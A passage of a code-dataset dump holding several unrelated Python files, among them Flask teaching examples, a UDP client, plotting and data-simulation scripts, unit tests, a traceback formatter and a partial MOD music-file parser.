= request.args.get('prodID')\n 
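# identify the visitor by the userID cookie that /atribuiID sets\n 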
userID = request.cookies.get('userID')\n cestos.setdefault(userID, []).append(prodID) # setdefault avoids a KeyError when the cookie is missing or unknown\n return f\"Produto adicionado! Cesto agora tem:
{cestos[userID]}\"\n\n@app.route(\"/atribuiID\")\ndef atribuiID():\n\n novoID = 'ab5bc01'\n cestos[novoID] = []\n resp = make_response('ID atribuído!')\n resp.set_cookie('userID', novoID)\n return resp\n\nif __name__ == \"__main__\":\n app.run(debug=False)\n ","sub_path":"uatla/LDSW/Aula06/codigos/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486391500","text":"# flake8: noqa\n# isort:skip_file\n\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\nfrom catalyst.tools import settings\n\ntry:\n from catalyst.contrib.utils.cv.image import (\n has_image_extension,\n imread,\n imwrite,\n imsave,\n mask_to_overlay_image,\n mimread,\n mimwrite_with_meta,\n )\nexcept ImportError as ex:\n if settings.cv_required:\n logger.warning(\n \"some of catalyst-cv dependencies not available,\"\n \" to install dependencies, run `pip install catalyst[cv]`.\"\n )\n raise ex\n\nfrom catalyst.contrib.utils.cv.tensor import (\n tensor_from_rgb_image,\n tensor_to_ndimage,\n)\n","sub_path":"catalyst/contrib/utils/cv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618165586","text":"from threading import Timer\nimport time\nimport socket\nfrom time import sleep\nUDP_PORT = 64123\nUDP_IP = \"\"\nMESSAGE = \"sveglia\"\nsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nsock.bind((UDP_IP,UDP_PORT))\nsock.sendto(MESSAGE, (\"10.0.1.108\", 64123))\n\n\nwhile (True):\n try:\n sock.settimeout(5.0)\n print(\"Aspetto dei dati\")\n data, addr = sock.recvfrom(1024)\n print(data)\n except socket.timeout:\n sock.settimeout(None)\n print(\"Time-out di comunicazione\")\n MESSAGE = \"STOP\"\n sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n sock.bind((UDP_IP,UDP_PORT))\n sock.sendto(MESSAGE, (\"10.0.1.108\", 64123))","sub_path":"tempWifi.py","file_name":"tempWifi.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438194672","text":"from matplotlib.backends.backend_pdf import PdfPages\nfrom ..Hyperion.hyp_read import *\nfrom ..Hyperion.hyp_hst import *\nfrom ..Hyperion.hyp_out import *\nfrom ..Hyperion.hyp_star import *\n\nimport matplotlib.pyplot as plt\n\nplotdir = '/Users/sudhirraskutti/Desktop/Thesis/PaperI/Figures/'\ndatadir = '/u/raskutti/PhD/Hyperion/Tests/RadParGrav/'\nhstfile = 'id0/RadParGrav.hst'\noutfile = 'RadParGrav.out'\nhostname = 'raskutti@bellona.astro.princeton.edu'\n\nysize = 0.25 * 11.69\nxsize = 0.4 * 8.27\nfontsize = '10'\n\ndflist = ['UV_M1.0e4_R8.0_N128_Tf4/', 'UV_M1.0e4_R8.0_N128_Tf4_NF/']\nnds = len(dflist)\ntimes = []\nmasses = []\n\nfor i in xrange(0,nds):\n datafolder = dflist[i]\n outlines = read_outfile(hostname,datadir + datafolder + outfile)\n hstdata = read_hstfile(hostname,datadir + datafolder + hstfile)\n tff = out_tff(outlines)\n mcloud = out_mcloud(outlines)\n time = hst_time(hstdata, tff)\n mstar = hst_mstar(hstdata, mcloud)\n mgas = hst_mgas(hstdata, mcloud)\n mass = mgas[0] - mstar - mgas\n mass = hst_mof(hstdata, mcloud, tff)\n times.append(time)\n masses.append(mass)\n\nplt.figure(figsize = [xsize,ysize])\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif', size=fontsize)\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif', size='12')\n\nplt.subplot(1,1,1)\nfor i in 
xrange(0,nds):\n plt.plot(times[i], masses[i])\nplt.axis([0,3,0,1])\nplt.xticks([])\nplt.yticks([0,0.5,1])\n\n#plt.xlabel(r\"$\\displaystyle t / t_{\\rm ff}$\")\nplt.ylabel(r\"$\\displaystyle M / M_{\\rm cl,0}$\")\nplt.text(0.05*3,0.9*1.5,r\"$\\displaystyle(a)$\")\n\npp = PdfPages(plotdir + 'ftest.pdf')\npp.savefig()\npp.close()\n\n\n","sub_path":"RadiationSims/Python/Experimental/pmof.py","file_name":"pmof.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176627800","text":"import unittest\n\nfrom models.session import Session\nfrom models.member import Member\nfrom models.booking import Booking\n\n\nclass TestBooking(unittest.TestCase):\n\n def setUp(self):\n self.session_1 = Session(\"Swimming\", \"Fri 24th\", \"this is a description\", 2)\n self.session_2 = Session(\"Swimming\", \"Fri 24th\", \"this is a description\", 3)\n self.session_3 = Session(\"Swimming\", \"Fri 24th\", \"this is a description\", 2)\n\n self.member_1 = Member(\"john jones\", \"fake@gmai.com\", False)\n self.member_2 = Member(\"john jones\", \"fake@gmai.com\", False)\n self.member_3 = Member(\"mary bell\", \"mary@fake.com\", True) \n\n self.booking_1 = Booking(self.member_1, self.session_1)\n self.booking_2 = Booking(self.member_2, self.session_1)\n\n self.bookings = [self.booking_1, self.booking_2]\n\n\n def test_booking(self):\n self.assertEqual(self.member_1, self.booking_1.member)\n\n","sub_path":"tests/booking_test.py","file_name":"booking_test.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"19446339","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 26 15:42:51 2012\r\n\r\n@author: kkhan\r\n\"\"\"\r\n\r\nimport wx \r\n\r\nclass ad_panel(wx.Panel): \r\n def __init__(self,parent,size=(400,300)): \r\n super(ad_panel,self).__init__(parent,-1,size,style=wx.SUNKEN_BORDER)\r\n \r\n wx.StaticText(self, -1, \"This is an example of static text\", \r\n (100, 10)) \r\n \r\n str = \"You can also change the font.\" \r\n self.text = wx.StaticText(self, -1, str, (20, 50)) \r\n font = wx.Font(18, wx.DECORATIVE, \r\n wx.ITALIC, wx.NORMAL) \r\n self.text.SetFont(font) \r\n \"\"\"\r\n wx.StaticText(self, -1, \r\n \"Your text\\ncan be split\\n\" \r\n \"over multiple lines\\n\\neven blank ones\", (20,150)) \r\n wx.StaticText(self, -1, \r\n \"Multi-line text\\ncan also\\n\" \r\n \"be right aligned\\n\\neven with a blank\", (220,150), \r\n style=wx.ALIGN_RIGHT) \"\"\" \r\n \r\n def ShowText(self,text):\r\n self.text.SetLabel(text)\r\n","sub_path":"menus/Account_panel/AccountDetail.py","file_name":"AccountDetail.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"178141705","text":"# coding: utf8\nfrom __future__ import unicode_literals, print_function\n\nfrom .util import color, supports_ansi, NO_UTF8\n\n\nLINE_EDGE = \"└─\" if not NO_UTF8 else \"|_\"\nLINE_FORK = \"├─\" if not NO_UTF8 else \"|__\"\nLINE_PATH = \"──\" if not NO_UTF8 else \"__\"\n\n\nclass TracebackPrinter(object):\n def __init__(\n self,\n color_error=\"red\",\n color_tb=\"blue\",\n color_highlight=\"yellow\",\n indent=2,\n tb_base=None,\n tb_exclude=tuple(),\n ):\n \"\"\"Initialize a traceback printer.\n\n color_error (unicode / int): Color name or code for errors.\n color_tb (unicode / int): Color name or code for traceback headline.\n color_highlight 
(unicode / int): Color name or code for highlights.\n indent (int): Indentation in spaces.\n tb_base (unicode): Name of directory to use to show relative paths. For\n example, \"thinc\" will look for the last occurence of \"/thinc/\" in\n a path and only show path to the right of it.\n tb_exclude (tuple): List of filenames to exclude from traceback.\n RETURNS (TracebackPrinter): The traceback printer.\n \"\"\"\n self.color_error = color_error\n self.color_tb = color_tb\n self.color_highlight = color_highlight\n self.indent = \" \" * indent\n self.tb_base = \"/{}/\".format(tb_base) if tb_base else None\n self.tb_exclude = tuple(tb_exclude)\n self.supports_ansi = supports_ansi()\n\n def __call__(self, title, *texts, **settings):\n \"\"\"Output custom formatted tracebacks and errors.\n\n title (unicode): The message title.\n *texts (unicode): The texts to print (one per line).\n highlight (unicode): Optional sequence to highlight in the traceback,\n e.g. the bad value that caused the error.\n tb (iterable): The traceback, e.g. generated by traceback.extract_stack().\n RETURNS (unicode): The formatted traceback. Can be printed or raised\n by custom exception.\n \"\"\"\n highlight = settings.get(\"highlight\", False)\n tb = settings.get(\"tb\", None)\n if self.supports_ansi: # use first line as title\n title = color(title, fg=self.color_error, bold=True)\n info = \"\\n\" + \"\\n\".join([self.indent + text for text in texts]) if texts else \"\"\n tb = self._get_traceback(tb, highlight) if tb else \"\"\n msg = \"\\n\\n{}{}{}{}\\n\".format(self.indent, title, info, tb)\n return msg\n\n def _get_traceback(self, tb, highlight):\n # Exclude certain file names from traceback\n tb = [record for record in tb if not record[0].endswith(self.tb_exclude)]\n tb_range = tb[-5:-2]\n tb_list = [\n self._format_traceback(path, line, fn, text, i, len(tb_range), highlight)\n for i, (path, line, fn, text) in enumerate(tb_range)\n ]\n tb_data = \"\\n\".join(tb_list).strip()\n title = \"Traceback:\"\n if self.supports_ansi:\n title = color(title, fg=self.color_tb, bold=True)\n return \"\\n\\n{indent}{title}\\n{indent}{tb}\".format(\n title=title, tb=tb_data, indent=self.indent\n )\n\n def _format_traceback(self, path, line, fn, text, i, count, highlight):\n template = \"{base_indent}{indent} {fn} [{line}] in {path}{text}\"\n indent = (LINE_EDGE if i == count - 1 else LINE_FORK) + LINE_PATH * i\n if self.tb_base and self.tb_base in path:\n path = path.rsplit(self.tb_base, 1)[1]\n text = self._format_user_error(text, i, highlight) if i == count - 1 else \"\"\n if self.supports_ansi:\n fn = color(fn, bold=True)\n path = color(path, underline=True)\n return template.format(\n base_indent=self.indent,\n line=line,\n indent=indent,\n text=text,\n fn=fn,\n path=path,\n )\n\n def _format_user_error(self, text, i, highlight):\n spacing = \" \" * i + \" >>>\"\n if self.supports_ansi:\n spacing = color(spacing, fg=self.color_error)\n if highlight and self.supports_ansi:\n formatted_highlight = color(highlight, fg=self.color_highlight)\n text = text.replace(highlight, formatted_highlight)\n return \"\\n{} {} {}\".format(self.indent, spacing, text)\n","sub_path":"venv/Lib/site-packages/wasabi/traceback.py","file_name":"traceback.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"280821378","text":"\"\"\"Tests for function module\"\"\"\n\nimport unittest\nfrom .. 
import parse_utils\n\nclass TestFunctions(unittest.TestCase):\n \"\"\"Test functionality of the functions module\"\"\"\n\n def test_return_kw_none(self):\n \"\"\"Test the response when there is no return keyword\"\"\"\n source = \\\n''' def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):\n \"\"\"_handle_long_word(chunks : [string],\n cur_line : [string],\n cur_len : int, width : int)\n\n Handle a chunk of text (most likely a word, not whitespace) that\n is too long to fit in any line.\n \"\"\"\n # Figure out when indent is larger than the specified width, and make\n # sure at least one character is stripped off on every pass\n if width < 1:\n space_left = 1\n else:\n space_left = width - cur_len\n\n # If we're allowed to break long words, then do so: put as much\n # of the next chunk onto the current line as will fit.\n if self.break_long_words:\n cur_line.append(reversed_chunks[-1][:space_left])\n reversed_chunks[-1] = reversed_chunks[-1][space_left:]\n\n # Otherwise, we have to preserve the long word intact. Only add\n # it to the current line if there's nothing already there --\n # that minimizes how much we violate the width constraint.\n elif not cur_line:\n cur_line.append(reversed_chunks.pop())\n\n # If we're not allowed to break long words, and there's already\n # text on the current line, do nothing. Next time through the\n # main loop of _wrap_chunks(), we'll wind up here again, but\n # cur_len will be zero, so the next line will be entirely\n # devoted to the long word that we can't handle right now.\n'''\n result = parse_utils.parse_return_keyword(source)\n self.assertEqual(result, set())\n\n def test_return_kw_return(self):\n \"\"\"Test the response when there is a return keyword\"\"\"\n source = \\\n'''def fill(text, width=70, **kwargs):\n \"\"\"Fill a single paragraph of text, returning a new string.\n\n Reformat the single paragraph in 'text' to fit in lines of no more\n than 'width' columns, and return a new string containing the entire\n wrapped paragraph. As with wrap(), tabs are expanded and other\n whitespace characters converted to space. 
See TextWrapper class for\n available keyword args to customize wrapping behaviour.\n \"\"\"\n w = TextWrapper(width=width, **kwargs)\n return w.fill(text)\n'''\n result = parse_utils.parse_return_keyword(source)\n self.assertEqual(result, set([('return', 'w.fill(text)')]))\n\n def test_return_kw_yield(self):\n \"\"\"Test the response when there is a yield keyword\"\"\"\n source = \\\n'''def firstn(n):\n num = 0\n while num < n:\n yield num\n num += 1\n yield num+7\n'''\n result = parse_utils.parse_return_keyword(source)\n self.assertEqual(result, set([('yield', 'num'), ('yield', 'num+7')]))\n\n def test_parse_exceptions(self):\n \"\"\"Test that exceptions are found in functions\"\"\"\n source = \\\n'''def demo_bad_catch():\n try:\n raise ValueError('represents a hidden bug, do not catch this')\n raise Exception('This is the exception you expect to handle')\n raise ValueError('Another Value Error, but it's only shown once')\n except Exception as error:\n print('caught this error: ' + repr(error))\n'''\n result = parse_utils.parse_function_exceptions(source)\n self.assertEqual(result, set([('raise', 'Exception'), ('raise', 'ValueError')]))\n\n\n def test_parse_class_attributes_simple(self):\n \"\"\"Test class attributes are correctly garnered from a simple class\"\"\"\n source = \\\n'''class TestClass(object):\n class_attr_1 = 0\n class_attr_2 = 2\n class_attr_override = 3\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n'''\n result = parse_utils.parse_class_attributes(source)\n self.assertEqual(result, set([('class_attr_1', '0'),\n ('class_attr_2', '2'),\n ('class_attr_override', '0'),\n ('inst_attr_1', '1'),\n ('inst_attr_2', '2')]))\n\n def test_parse_class_attributes_nested_indented(self):\n \"\"\"Test class attributes are correctly garnered from a simple class\"\"\"\n source = \\\n''' class TestClass(object):\n class_attr_1 = 0\n class_attr_2 = 2\n class_attr_override = 3\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n\n class ChildClass(object):\n sub_class_attr = 0\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n'''\n result = parse_utils.parse_class_attributes(source)\n self.assertEqual(result, set([('class_attr_1', '0'),\n ('class_attr_2', '2'),\n ('class_attr_override', '0'),\n ('inst_attr_1', '1'),\n ('inst_attr_2', '2')]))\n\n def test_parse_class_attributes_ignored_nested_class(self):\n \"\"\"Test class attributes from a nested class are ignored\"\"\"\n source = \\\n'''class TestClass(object):\n class_attr_1 = 0\n class_attr_2 = 2\n class_attr_override = 3\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n\n class ChildClass(object):\n sub_class_attr = 0\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n'''\n result = parse_utils.parse_class_attributes(source)\n self.assertEqual(result, set([('class_attr_1', '0'),\n ('class_attr_2', '2'),\n ('class_attr_override', '0'),\n ('inst_attr_1', '1'),\n ('inst_attr_2', '2')]))\n","sub_path":"pydocstring/tests/test_parse_utils.py","file_name":"test_parse_utils.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67744462","text":"from flask import Flask\r\nimport subprocess\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return 'Hello 
World!'\r\n\r\nfrom flask import request # missing import: the handler below reads query args via request\r\n\r\n@app.route('/do-ocr/')\r\ndef pushForOCR():\r\n strImagePath = request.args.get(\"path\").lower()\r\n\r\n # 'text' variable contains the text from @strImagePath\r\n text = subprocess.check_output(['tesseract', strImagePath, 'stdout'])\r\n return text # return the OCR result instead of falling through with None\r\n\r\nif __name__ == '__main__':\r\n app.debug = True\r\n app.run(host=\"0.0.0.0\")\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283040996","text":"from datetime import datetime\nfrom collections import OrderedDict\n\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass Commodity:\n def __init__(self):\n pass\n food = \"Food & non-alcoholic drinks\"\n alcohol_tobacco = \"Alcoholic drinks, tobacco & narcotics\"\n clothing = \"Clothing & footwear\"\n housing = \"Housing (net), fuel & power\"\n household = \"Household goods & services\"\n health = \"Health\"\n transport = \"Transport\"\n communication = \"Communication\"\n recreation_culture = \"Recreation & culture\"\n education = \"Education\"\n restaurants_hotels = \"Restaurants & hotels\"\n misc_goods = \"Miscellaneous goods & services\"\n other = \"Other expenditure items\"\n\nCOMMODITIES = [Commodity.food, Commodity.alcohol_tobacco, Commodity.clothing,\n Commodity.housing, Commodity.household, Commodity.health,\n Commodity.transport, Commodity.communication,\n Commodity.recreation_culture, Commodity.education,\n Commodity.restaurants_hotels, Commodity.misc_goods,\n Commodity.other]\n\n\nclass AgeGroup:\n def __init__(self, name, commodity_probas):\n self.name = name\n self.commodity_probas = commodity_probas\n\n\nclass AgeGroups:\n def __init__(self):\n pass\n # Data source:\n # http://tinyurl.com/hyot8qu\n # http://tinyurl.com/jjz6x36\n # Data description: Table A10 - Household expenditure as a percentage of\n # total expenditure by age of household reference person, 2012\n # Note: The one who prepared the data has rounded percentages to integers,\n # which leads to a situation where the sum of percentages won't sum up to\n # 100. 
We can fix this by dividing the array by the sum of elements\n # in the array.\n less_than_30 = AgeGroup(name=\"Less than 30\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 9, 2, 5, 24, 5, 0, 12, 3, 10, 3, 9, 7, 11])))\n from_30_to_49 = AgeGroup(name=\"30 to 49\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 11, 2, 5, 13, 5, 1, 13, 3, 12, 2, 8, 8, 16])))\n from_50_to_64 = AgeGroup(name=\"50 to 64\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 12, 3, 5, 11, 6, 1, 14, 3, 13, 1, 9, 8, 13])))\n from_65_to_74 = AgeGroup(name=\"65 to 74\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 14, 3, 4, 12, 6, 2, 13, 3, 16, 1, 8, 8, 11])))\n more_than_75 = AgeGroup(name=\"75 or over\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 15, 2, 3, 16, 7, 4, 9, 3, 11, 0, 7, 9, 12])))\n\n @staticmethod\n def get_all_age_groups():\n all_vars = []\n for _, var in vars(AgeGroups).items():\n if isinstance(var, AgeGroup):\n all_vars.append(var)\n return all_vars\n\n\ndef visualize_spending_per_age_group():\n # Put the data to Pandas DataFrame\n age_groups_df = pd.DataFrame()\n for g in AgeGroups.get_all_age_groups():\n probas = np.array(list(g.commodity_probas.values()))\n age_groups_df[g.name] = probas/probas.sum() * 100.0\n # Sort the columns in right order\n age_groups_df = age_groups_df[[\n AgeGroups.less_than_30.name, AgeGroups.from_30_to_49.name,\n AgeGroups.from_50_to_64.name, AgeGroups.from_65_to_74.name,\n AgeGroups.more_than_75.name]]\n # Visualize\n age_groups_df = age_groups_df.transpose()\n ax = age_groups_df.plot.bar(\n stacked=True, legend='reverse',\n colormap='Spectral', rot=0, figsize=(10, 7))\n ax.set_ylim((0, 100))\n ax.set_ylabel(\"Proportion (%)\", fontsize=10)\n ax.set_xlabel(\"Age group\", fontsize=10)\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles[::-1], COMMODITIES[::-1], title='Commodities',\n loc='upper left', bbox_to_anchor=(1, 1))\n plt.subplots_adjust(right=0.7)\n # plt.savefig('spending_per_age_group.png')\n\n\ndef get_random_hour_of_day(n_hours=1000, visualize=False):\n transactions_per_hour = np.array([\n # Taken from BI348Chapter02Finished.xlsx, sheet: Time Histogram\n # Created from 26524 Boomerang Inc online sales transactions\n # https://people.highline.edu/mgirvin/excelisfun.htm\n # https://www.youtube.com/watch?v=3YeoX1Cl7Og\n 219, 234, 1579, 1813, 1773, 984, 226, 211, 213, 341, 966, 4062, 4174,\n 1962, 337, 318, 975, 2025, 2094, 934, 333, 249, 246, 256])\n hour_probas = np.round(\n transactions_per_hour.astype(float) / transactions_per_hour.sum(),\n decimals=3)\n if visualize:\n ax = plt.figure().add_subplot(111)\n ax.bar(range(len(hour_probas)), hour_probas)\n ax.set_xlim((0, len(hour_probas)))\n ax.set_xticks(range(len(hour_probas)))\n ax.set_ylabel('Probability of transaction')\n ax.set_xlabel('Hour')\n plt.show()\n return np.random.choice(\n a=len(transactions_per_hour), size=n_hours,\n # p = The probabilities associated with each entry in a\n p=hour_probas)\n\n\ndef get_random_weekday(n_days=1000, visualize=False):\n sales_per_weekday = np.array([\n # Taken from http://g3cfo.com/little-fun-simple-flash-report/\n # Created from restaurant sales\n 10237, 8365, 9018, 9547, 13313, 19055, 17660])\n weekday_probas = np.round(\n sales_per_weekday.astype(float) / sales_per_weekday.sum(), decimals=3)\n if visualize:\n fig = plt.figure()\n fig.subplots_adjust(bottom=0.2)\n ax = fig.add_subplot(111)\n ax.bar(range(len(weekday_probas)), weekday_probas)\n ax.set_xlim((0, len(weekday_probas)))\n 
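# one tick per weekday, named and rotated so the labels stay readable\n 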
ax.set_xticks(range(len(weekday_probas)))\n ax.set_xticklabels(['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday'],\n rotation=45, ha='left')\n ax.set_ylabel('Probability of transaction')\n ax.set_xlabel('Day of week')\n plt.show()\n return np.random.choice(\n a=len(sales_per_weekday), size=n_days,\n # p = The probabilities associated with each entry in a\n p=weekday_probas)\n\n\ndef simulate(n_persons=100,\n start_time=datetime(year=2010, month=1, day=1),\n end_time=datetime(year=2016, month=1, day=1)):\n random_hours = get_random_hour_of_day(n_hours=n_persons)\n random_weekdays = get_random_weekday(n_days=n_persons)\n\n # For debugging purposes, plot the sampled data\n for sampled_data in [random_hours, random_weekdays]:\n ax = plt.figure().add_subplot(111)\n _, unique_counts = np.unique(sampled_data, return_counts=True)\n ax.bar(range(len(unique_counts)), unique_counts)\n plt.show()\n","sub_path":"datasimulation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"78574460","text":"from sys import exit\nfrom modtrack import DP\n\ndef nibbles(bt):\n h = bt >> 4\n l = bt & 0x0F\n return h,l\n\ndef nibbles2byte(low,high):\n return high*16+low\n\ndef nibbles2(bt_array):\n nibble_array=[]\n for bt in bt_array:\n h,l=nibbles(bt)\n nibble_array.append(h)\n nibble_array.append(l)\n return nibble_array\n\ndef hexs(bt_array):\n hexout=\"\"\n for bt in bt_array:\n hexout=hexout+(hex(bt)[2:].zfill(2))\n return hexout.upper()\n\nformat = \"\"\nsamples=[]\npatterns=[]\npattern_table=None\nnr_playedpatterns=0\n\ndef amigaword_toint(b1,b2):\n return b2*256+b1\n\nMOD_FORMATS = {\n 'STK.' : (\n \"Ultimate Soundtracker (Original) 4 channel / 15 instruments\",\n 15, True\n ),\n 'M.K.' : (\n \"Protracker 4 channel / 31 instruments\",\n 31, True\n ),\n 'M!K!' 
: (\n \"Protracker 4 channel / 31 instruments / >64 patterns\",\n 31, False\n ),\n 'FLT4' : (\n \"Startracker 4 channel / 31 instruments\",\n 31, True\n ),\n 'FLT8' : (\n \"Startracker 8 channel / 31 instruments\",\n 31, False\n ),\n '2CHN' : (\n \"Fasttracker 2 channel / 31 instruments\",\n 31, False\n ),\n '4CHN' : (\n \"Fasttracker 4 channel / 31 instruments\",\n 31, True\n ),\n '6CHN' : (\n \"Fasttracker 6 channel / 31 instruments\",\n 31, False\n ),\n '8CHN' : (\n \"Fasttracker 8 channel / 31 instruments\",\n 31, False\n ),\n 'CD81' : (\n \"Atari oktalyzer 8 channel / 31 instruments\",\n 31, False\n ),\n 'OKTA' : (\n \"Atari oktalyzer 8 channel / 31 instruments\",\n 31, False\n ),\n 'OCTA' : (\n \"Atari oktalyzer 8 channel / 31 instruments\",\n 31, False\n ),\n '16CN' : (\n \"Taketracker 16 channel / 31 instruments\",\n 31, False\n ),\n '32CN' : (\n \"Taketracker 32 channel / 31 instruments\",\n 31, False\n )\n}\n\ndef formdesc_from_bytes(bytes4):\n try:\n format = bytes4.decode(\"utf-8\")\n except UnicodeDecodeError:\n format = \"STK.\"\n if bytes4 == b'\\x00\\x00\\x00\\x00':\n format = \"STK.\"\n if not format.isprintable():\n format = \"STK.\"\n return format, MOD_FORMATS[format]\n\n# https://wiki.multimedia.cx/index.php/Protracker_Module\n# http://www.fileformat.info/format/mod/corion.htm\n# http://elektronika.kvalitne.cz/ATMEL/MODplayer3/doc/MOD-FORM.TXT\n# http://www.eblong.com/zarf/blorb/mod-spec.txt\n# http://web.archive.org/web/20120806024858/http://16-bits.org/mod/\n# ftp://ftp.modland.com/pub/documents/format_documentation\n# /FireLight%20MOD%20Player%20Tutorial.txt\n\ndef read_module(filename):\n global samples,patterns,pattern_table,nr_playedpatterns\n\n with open(filename, 'rb') as fh:\n barr = bytearray(fh.read())\n\n # Compressed with PowerPacker, we can't decode this\n if barr[0:4] == b'PP20': # bytes literal: a bytearray never compares equal to a str in Python 3\n return None\n\n nr_channels = 4\n id_bytes = barr[1080:1084]\n id, (desc, nr_samples, compatible) = formdesc_from_bytes(id_bytes)\n if not compatible:\n errmsg = f'Format {id} ({desc}) is not supported!'\n raise ValueError(errmsg)\n\n songtitle = barr[0:20].decode(\"utf-8\")\n\n fmt = 'song \"%s\" type %s'\n DP.header('LOADING', fmt, (songtitle, desc))\n\n offset = 20\n for sample in range (0, nr_samples):\n sample = {}\n sample[\"name\"] = barr[offset:offset + 22]\n sample['name'] = sample['name'].decode(\"utf-8\").replace('\\x00', '')\n\n # sample len in words (1word=2bytes). 
1st word overwritten by tracker\n sample['len'] = 2*int.from_bytes(\n barr[offset+22:offset+24],\n byteorder=\"big\",signed=False)\n sample[\"finetune\"] = barr[offset + 24]#.decode(\"utf-8\")\n sample[\"volume\"] = barr[offset + 25]#.decode(\"utf-8\")\n sample[\"repeat_from\"] = 2 * int.from_bytes(barr[offset + 26:offset + 28],byteorder=\"big\",signed=False)\n sample[\"repeat_len\"] = 2 * int.from_bytes(barr[offset + 28:offset + 30],byteorder=\"big\",signed=False)\n\n fmt = 'sample \"%-20s\" %5d bytes repeat %2d:%2d vol %2d'\n args = (sample['name'], sample['len'],\n sample['repeat_from'], sample['repeat_len'],\n sample['volume'])\n DP.print(fmt, args)\n samples.append(sample)\n offset=offset+30\n\n DP.print('offset %d', offset)\n\n #offset=470 15 samples Ultimate Soundtracker, id at 600\n #offset=950 31 samples Protracker and similar, id at 1080\n\n nr_playedpatterns=barr[offset] # hex value was loaded as byte and is automatically converted to int\n offset=offset+1\n dummy127=barr[offset]\n offset=offset+1\n pattern_table=barr[offset:offset+128]\n offset=offset+128\n\n DP.print('offset %d', offset)\n # Only other format then Ultimate Soundtracker have bytes to\n # specify format\n if not format == \"STK.\":\n dummyformat = barr[offset:offset+4].decode(\"utf-8\")\n offset = offset+4\n\n DP.print('patterns %d, format %s' , (nr_playedpatterns, format))\n\n #read nr patterns stored\n #equal to the highest patternnumber in the song position table(at offset 952 - 1079).\n nr_patterns_stored=0\n for chnr in range(128):\n DP.print('pattern_table[%3d] = %d', (chnr, pattern_table[chnr]))\n # Check for first not possible because 0 is also a valid\n # pattern number\n if pattern_table[chnr]!=0:\n nr_patternsplayed=chnr+1\n if (pattern_table[chnr]+1)>nr_patterns_stored:\n nr_patterns_stored=(pattern_table[chnr]+1)\n\n pattern_table=pattern_table[:nr_playedpatterns]\n DP.print(\"nr patterns stored: %d\", nr_patterns_stored)\n\n notelist = [\"C-\", \"C#\", \"D-\", \"D#\", \"E-\", \"F-\", \"F#\", \"G-\", \"G#\", \"A-\", \"A#\", \"B-\"]\n periods = [\n 1712,1616,1525,1440,1357,1281,1209,1141,1077,1017, 961, 907,\n 856, 808, 762, 720, 678, 640, 604, 570, 538, 508, 480, 453,\n 428, 404, 381, 360, 339, 320, 302, 285, 269, 254, 240, 226,\n 214, 202, 190, 180, 170, 160, 151, 143, 135, 127, 120, 113,\n 107, 101, 95, 90, 85, 80, 76, 71, 67, 64, 60, 57,\n ]\n def period2note(period):\n notenr=-1\n for nr,val in enumerate(periods):\n if val==period:\n notenr=nr % 12\n oct=nr//12\n if notenr>=0:\n note=notelist[notenr]+str(oct)\n else:\n note=\"---\"\n return note\n\n patterns = []\n for pattern in range (0,nr_patterns_stored):\n pattern=[]\n for row in range(64):\n row=[]\n txt=\"\"\n txt2= \"\"\n for channel in range(nr_channels):\n bytes = barr[offset:offset+4]\n\n nibbles=hexs(bytes)\n samplenr=int(nibbles[0]+nibbles[4],16)\n samplehex=nibbles[0]+nibbles[4]\n\n\n\n noteperiod=int(nibbles[1:4],16)\n\n effect = nibbles[5:8]\n txt2=txt2+\"{} -> {} {} {} | \".format(nibbles,noteperiod,samplehex,effect)\n note=period2note(noteperiod)\n seq_text=\"{:<3} {} {:<3}\".format(note,samplehex,effect)\n row.append(seq_text)\n #txt = txt + seq_text+ \" \"\n 